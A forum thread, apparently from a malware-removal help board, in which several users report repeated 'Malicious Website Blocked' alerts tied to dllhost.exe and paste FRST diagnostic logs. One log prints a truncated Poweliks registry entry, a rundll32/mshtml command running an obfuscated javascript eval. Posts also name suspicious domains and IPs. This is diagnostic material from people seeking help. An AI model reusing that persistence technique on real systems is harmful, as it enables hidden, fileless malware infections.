2014-10-26 16:35 - 2012-08-30 12:24 - 00000000 ____D () C:\Users\Office\AppData\Local\CrashDumps 2014-10-26 16:16 - 2012-08-10 20:59 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job 2014-10-26 16:05 - 2012-09-12 12:58 - 00000000 ___RD () C:\Users\Office\Virtual Machines 2014-10-26 14:17 - 2014-06-21 20:50 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys 2014-10-26 13:27 - 2014-06-21 20:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-10-26 13:27 - 2012-08-21 16:11 - 00000000 ____D () C:\Program Files (x86)\Constant Guard Protection Suite 2014-10-26 13:12 - 2012-08-25 13:06 - 00003192 _____ () C:\windows\System32\Tasks\HPCeeScheduleForOffice 2014-10-26 13:12 - 2012-08-25 13:06 - 00000336 _____ () C:\windows\Tasks\HPCeeScheduleForOffice.job 2014-10-26 12:54 - 2012-08-21 22:25 - 00000000 ____D () C:\Users\Office\Documents\Outlook Files 2014-10-26 12:51 - 2013-08-30 20:36 - 04091595 _____ () 
C:\Users\Office\AppData\Local\Tempchannel_logos.zip 2014-10-26 12:49 - 2012-08-17 17:35 - 01641515 _____ () C:\windows\WindowsUpdate.log 2014-10-26 12:40 - 2013-08-30 20:10 - 00000000 ____D () C:\Users\Office\AppData\Local\IR 2014-10-26 12:39 - 2013-08-30 20:09 - 00000000 ____D () C:\Program Files (x86)\Belkin 2014-10-26 12:39 - 2012-08-10 20:51 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information 2014-10-26 12:39 - 2009-07-13 21:51 - 00078507 _____ () C:\windows\setupact.log 2014-10-26 12:29 - 2013-07-14 11:52 - 00000000 ____D () C:\Program Files (x86)\NCH Software 2014-10-26 12:29 - 2012-08-17 16:43 - 00003934 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{4F6E0B12-ADF8-4394-87C7-78D6CE8AE75E} 2014-10-26 12:28 - 2012-12-09 15:45 - 00000000 ____D () C:\Users\Office\AppData\Local\TomTom 2014-10-26 12:18 - 2014-07-05 15:24 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Firetrust 2014-10-26 11:58 - 2009-07-13 21:45 - 00027568 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-10-26 11:58 - 2009-07-13 21:45 - 00027568 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-10-26 11:57 - 2012-08-21 16:12 - 00000000 ____D () C:\Users\Office\AppData\Roaming\ID Vault 2014-10-26 11:54 - 2009-07-13 22:13 - 00801082 _____ () C:\windows\system32\PerfStringBackup.INI 2014-10-26 11:50 - 2013-04-30 18:19 - 00000000 ___RD () C:\Users\Office\Dropbox 2014-10-26 11:50 - 2013-04-30 18:17 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Dropbox 2014-10-26 11:48 - 2014-01-23 17:54 - 00001006 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk 2014-10-26 11:48 - 2014-01-23 17:54 - 00000990 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk 2014-10-26 11:48 - 2012-08-10 21:05 - 00000000 ____D () C:\ProgramData\PDFC 2014-10-26 11:47 - 2009-07-13 22:08 - 
00000006 ____H () C:\windows\Tasks\SA.DAT 2014-10-26 11:45 - 2012-08-21 08:20 - 00000000 ____D () C:\ProgramData\LogMeIn 2014-10-25 19:32 - 2013-07-14 12:20 - 00000000 ____D () C:\windows\Minidump 2014-10-25 19:31 - 2012-08-10 21:54 - 00304227 ____N () C:\windows\Minidump\102514-91525-01.dmp 2014-10-25 19:07 - 2013-05-20 18:41 - 00000000 ____D () C:\Users\Office\AppData\Local\Akamai 2014-10-25 13:36 - 2012-12-08 14:25 - 00000000 _____ () C:\windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt 2014-10-25 13:36 - 2012-08-18 13:53 - 00000052 _____ () C:\windows\SysWOW64\DOErrors.log 2014-10-25 02:01 - 2012-08-19 20:50 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-25 02:01 - 2012-08-19 20:50 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-25 02:01 - 2012-08-19 20:50 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-10-25 02:01 - 2012-08-19 20:50 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-24 14:16 - 2014-06-21 20:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-10-24 14:16 - 2013-11-22 12:07 - 00001161 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-10-24 10:18 - 2010-11-20 20:47 - 01081140 _____ () C:\windows\PFRO.log 2014-10-23 05:30 - 2014-02-24 19:25 - 00003598 _____ () C:\windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3549027879-2872290269-2961675323-1000 2014-10-22 14:35 - 2012-09-12 13:44 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Virtual PC 2014-10-21 21:52 - 2014-02-28 19:05 - 00000000 ____D () C:\Users\Office\Documents\GeoData 2014-10-21 14:18 - 2013-07-12 15:43 - 00000000 ____D () C:\Users\Office\AppData\Roaming\DSite 2014-10-19 22:06 - 2012-08-21 16:25 - 00000000 ____D () C:\windows\system32\Drivers\N360x64 2014-10-19 22:06 - 2012-08-10 21:08 - 00003228 _____ () C:\windows\System32\Tasks\Norton WSC Integration 2014-10-19 
22:05 - 2013-12-01 11:03 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite 2014-10-19 22:05 - 2013-11-25 22:36 - 00002442 _____ () C:\Users\Public\Desktop\Norton Security Suite.lnk 2014-10-16 19:01 - 2012-08-19 20:51 - 00002238 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-10-15 04:27 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\rescache 2014-10-15 03:38 - 2009-07-13 22:09 - 00000000 ____D () C:\windows\System32\Tasks\WPD 2014-10-15 03:34 - 2009-07-13 21:45 - 00440176 _____ () C:\windows\system32\FNTCACHE.DAT 2014-10-15 03:30 - 2014-05-06 03:00 - 00000000 ___SD () C:\windows\system32\CompatTel 2014-10-15 03:30 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\SysWOW64\Dism 2014-10-15 03:30 - 2009-07-13 20:20 - 00000000 ____D () C:\windows\system32\Dism 2014-10-15 03:13 - 2012-08-21 22:10 - 00000000 ____D () C:\ProgramData\Microsoft Help 2014-10-15 03:09 - 2013-08-15 03:01 - 00000000 ____D () C:\windows\system32\MRT 2014-10-15 03:00 - 2012-08-26 17:54 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe 2014-10-15 01:54 - 2013-01-18 13:54 - 00001415 _____ () C:\Users\Office\Desktop\GoToMeeting.lnk 2014-10-15 01:54 - 2012-08-28 18:25 - 00002489 _____ () C:\Users\Office\Desktop\GoToMeeting Quick Connect.lnk 2014-10-09 10:17 - 2012-08-21 16:12 - 00000000 ____D () C:\Users\Office\AppData\Local\ID Vault 2014-10-08 22:04 - 2013-02-13 04:26 - 00049752 _____ (Zemana Ltd.) 
C:\windows\system32\Drivers\AntiLog64.sys 2014-10-08 22:04 - 2013-02-13 04:26 - 00000000 ____D () C:\windows\SysWOW64\ZALSDK_uninst 2014-10-08 22:04 - 2012-08-21 16:11 - 00002256 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Constant Guard.lnk 2014-10-08 22:04 - 2012-08-21 16:11 - 00002244 _____ () C:\Users\Public\Desktop\Constant Guard.lnk 2014-10-08 16:56 - 2014-09-07 14:25 - 00000000 ____D () C:\Program Files (x86)\iTunes 2014-10-02 21:40 - 2014-02-09 17:09 - 00002000 _____ () C:\Users\Office\Desktop\Sync Folder.lnk 2014-10-02 21:40 - 2013-07-07 17:10 - 00004022 _____ () C:\windows\System32\Tasks\LaunchApp 2014-10-01 11:11 - 2014-06-21 20:49 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys 2014-10-01 11:11 - 2014-06-21 20:49 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys 2014-10-01 11:11 - 2013-11-22 12:07 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys 2014-09-29 13:32 - 2014-08-27 16:03 - 00000000 ____D () C:\Users\Office\Documents\Better For You CHIA project 2014-09-28 16:48 - 2013-07-14 11:53 - 00000000 ____D () C:\windows\System32\Tasks\NCH Software 2014-09-27 13:37 - 2013-07-12 13:23 - 00000000 ____D () C:\Users\Office\Documents\Any Video Converter 2014-09-27 09:51 - 2012-08-17 16:43 - 00000000 ____D () C:\Users\Office\AppData\Local\PDFC 2014-09-27 08:09 - 2014-09-25 20:07 - 00000000 ____D () C:\Users\Office\AppData\Local\{AD6D95B6-1A16-454D-A1F5-E8ADAC9FC5AE} Some content of TEMP: ==================== C:\Users\Office\AppData\Local\Temp\@TVSoftware.exe C:\Users\Office\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp3zs_ff.dll C:\Users\Office\AppData\Local\Temp\instmsia.exe C:\Users\Office\AppData\Local\Temp\instmsiw.exe C:\Users\Office\AppData\Local\Temp\ISSetup.dll C:\Users\Office\AppData\Local\Temp\Setup.exe C:\Users\Office\AppData\Local\Temp\WindowsInstaller-KB893803-x86.exe ==================== 
Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-16 00:40 ==================== End Of Log ============================ Addition.txt FRST.txt
  12. I keep getting notifications of a malicious website blocked. Domain: e9967a.com IP 31.184.192.92 Port: 62338 Outbound Process: C:\Widoes\SysWOW64\dllhost.exe. Sometimes the IP changes and sometimes the domain doesn't show up. I get the notification several times per minute. I've run scans on both Avast and Malwarebytes several times even with the rootkit scan but nothing comes up. What should I do?
  13. Hello, I have recently (the last couple days) been constantly getting the "Malicious Website Blocked" popups, even when no web browsers are open. As many others on here have written, the popups report different IPs, different/no domains, different ports, but are always "outbound" types, and the process is always "C:\Windows\SysWOW64\dllhost.exe", although I have now noticed a few times where it's a different file name than "dllhost.exe". I have scanned many times with MBAM Premium, with rootkits checked, but it always comes up clean. Also, my situation may be unique because I have noticed over the last couple days when I scan with AVG at startup that it finds about 7 medium threats called "Malsign.Generic.712". It always secures/removes them, then I rescan and it's clean, but then the next time when I start up and scan with AVG, I get that same virus scan result. So I may have at least a couple problems simultaneously going on here. I have hesitated to just start tinkering around with some of the in-depth resolutions offered on the forums here, because (1) I am new to trying to manually extract malware/viruses, and (2) because they are for the specific person/computer, and I don't want to make things worse. Can anyone help me get this straightened out? Thank you in advance for any help! Seanster
  14. Just like so many others. However I believe I have two computers infected. Both are now protected with Malwarebytes Premium, so websites are blocked. Please help. Bill Schickling
  15. I keep getting a pop-up saying "Malicious website blocked" Process: C:\Windows\SysWOW64\dllhost.exe. My CPU and RAM are ridiculously high and my computer has gone to bluescreen and crashed twice while trying to scan it. I finally did scan it though and it, of course, didn't find anything. Neither did System Mechanic Pro. I've seen a lot of posts about this, but since I have no idea what I'm doing, I'd really like someone to walk me through it, I guess. Thanks c:
  16. Have had issues with high CPU and memory usage, multiple dllhost.exe files, and in general some weird stuff. Installed and ran Malwarebytes Anti-Malware, continue to get "Malicious Website Blocked", different domain names, different IP, different ports, always "Outbound", and process is always C:\Windows\SysWOW64\dllhost.exe. Ran FRST and attached FRST.txt and Addition.txt. Also attached FixLog.txt. Ran Malwarebytes Anti-Malware, and attached scan log entitled ScanLog.txt. Ran AdwCleaner, and attached log entitled AdwCleaner[s0].txt. Still getting "Malicious Website Blocked" notices every few seconds. Could use some help continuing to troubleshoot and ensure nothing else is hanging onto my computer. Thanks. FRST.txt Addition.txt ScanLog.txt Fixlog.txt AdwCleanerS0.txt
  17. After installing MB I am getting a constant barrage of "Malicious Website Blocked" (usually 95.215.1.57) and "Malware Detected" (usually Trojan.FakeMS). I have attached the FRST files. Addition.txt FRST.txt
  18. I keep getting this popup from Malwarebytes after running my initial scan. I do have dllhost.exe in my task manager processes, but usually only 2 and they aren't consuming a lot of resources like what I've read about with others. I've noticed a strange behavior with my browsers (Firefox and IE) which is why I decided to download MWB in the first place. I was getting IE crashes with no browser or processes open. After running MWB, that seems to have stopped, but now the constant popups... please help! Thanks in advance!
  19. My problem is very insidious, and also very weird. As soon as I connect to the internet, my CPU is flooded by multiple instances of ctfmon.exe, about 17 to 20 instances in the Task Manager. They appear only for a moment before disappearing again, but then multiple instances of explorer.exe (the Windows Explorer, not Internet Explorer) pop up, using anywhere from 25% to 60% of my CPU. Sometimes, even multiple instances of dllhost.exe pop into the Task Manager as well. At this point, my malware removal and prevention steps have taken me through running in Safe Mode and running Malwarebytes Anti-Malware, Spybot - Search and Destroy, and even Windows Malware Removal Tool. These programs find no infected files, and say the computer is clean. Doing research has been hell. I have to continually disable and enable my network adaptor to keep from being overrun, but I have succeeded somewhat. A lot of the forums I have looked at say this is a rootkit issue; one person even started deleting registry keys (I have absolutely no intention of playing that type of Russian Roulette). I saw an entry here, linked at http://forums.malwarebytes.org/index.php?/topic/140963-multiple-instances-of-explorerexe-in-task-manager/, and the solution went very far, but the user stopped responding near the end, and thus the topic was closed. Instead of just blindly following that topic, I have decided to post here myself to find out what should be done in my case. Any assistance would be appreciated. My smartphone is currently unaffected, so I will be receiving e-mail updates by following my thread on here, and I will turn my adaptor back on to receive instructions and continue to debug this issue. Thank you very much for your time.
  20. Hi - I'm having the same problem that a lot of people have posted about with dllhost.exe and cannot get rid of it. I've run Malwarebytes Premium and it detected some items, but I'm worried that the problem will come back like with other users. Scan log attached. Please help! Threat Scan Log.txt
  21. Computer started running slow yesterday. My free version of Avast found three problems and tried to fix. I downloaded Malwarebytes and it also fixed some problems. Looking in my Task Manager, Processes tab I see a few entries for dllhost.exe *32 COM Surrogate. File Properties for them are C:\Windows\SysWOW64. For kicks I manually killed them and performance improved, but a few mins later my system again degraded. Attached are my Farbar FRST.txt and Addition.txt log files. Thanks. FRST.txt Addition.txt
  22. My PC started running slow yesterday so I ran MWB multiple times and it only removed things the first go. I was running MSE which removed some things, then I switched to AVG and it removed even more. I did a boot scan with AVG and quarantined all those items, but I still get the warning "Avast Web Shield has blocked a harmful webpage or file" C:\windows\syswow64\dllhost.exe. MWB cleaned some, rebooted, then I ran it again and found nothing. I still get the AVG Web Shield warnings. Any advice is appreciated. - Brian
  23. As does its lesser known, yet still just as annoying siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time, that I've seen, after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe the latter was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT! I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank. The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola. An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly. 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by Calahan (administrator) on HP8100-2 on 10-11-2014 22:57:24
Running from C:\Users\Calahan\Downloads
Loaded Profile: Calahan (Available profiles: Mike2 & Logan & Elisa & Calahan & Administrator & Guest)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7938080 2009-07-02] (Realtek Semiconductor)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [196648 2009-06-03] (ActivIdentity)HKLM\...\Run: [] => [X]HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [483880 2009-06-03] (ActivIdentity)HKLM\...\Run: [GamecomSound] => C:\Program Files\Plantronics\GameCom780\GameCom780.exe [777448 2011-12-01] ()HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS \PIconStartup.exe [111640 2009-11-04] ()HKLM-x32\...\Run: [File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exeHKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)HKLM-x32\...\Run: [tvncontrol] => C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech 
Inc.)HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti- Malware\mbamdor.exe [54072 2014-10-01] (Malwarebytes Corporation)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55360 2014-06-24] (Raptr, Inc)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [HydraVisionDesktopManager] => C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe [380928 2009-10-19] (AMD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf \Overwolf.exe [39712 2014-10-22] (Overwolf LTD)HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\.. \mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Folding@home.lnkShortcutTarget: Folding@home.lnk -> C:\Program Files (x86)\FAHClient\HideConsole.exe ()Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office \Office14\ONENOTEM.EXE (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:TabsStartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exeSearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms} &ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms} &l=dis&o=CMDTDFSearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p= {searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDFSearchScopes: HKCU - DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = SearchScopes: HKCU - {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office \Office14\GROOVEEX.DLL (Microsoft Corporation)BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files \Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office \Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java \jre7\bin\ssv.dll (Oracle 
Corporation)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java \jre7\bin\jp2ssv.dll (Oracle Corporation)DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D- 4117-8430-A67417AA88CD/LegitCheckControl.cabDPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - No FileHandler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System \BAVoilaX.dll (Belarc, Inc.)Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype \Skype4COM.dll (Skype Technologies)Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)Hosts: There are more than one entry in Hosts. 
See Hosts section of Addition.txtTcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75 192.168.3.1 FireFox:========FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin \npDeployJava1.dll (Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight \5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update \1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users \Calahan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft \Ubisoft Game Launcher\npuplaypc.dll () Chrome: =======CHR HomePage: Default -> CHR StartupUrls: Default -> ""CHR Profile: 
C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data \Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-31]CHR Extension: (AdBlock) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \gighmmpiobklfepjocnamgkkbiglidom [2014-11-05]CHR Extension: (Google Wallet) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions \nmmhkkegccagdldgiimedpiccmgmieda [2014-05-14]CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars \ChromeExtension\skype_chrome_extension.crx [2014-07-14]CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2014 -07-14] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) 
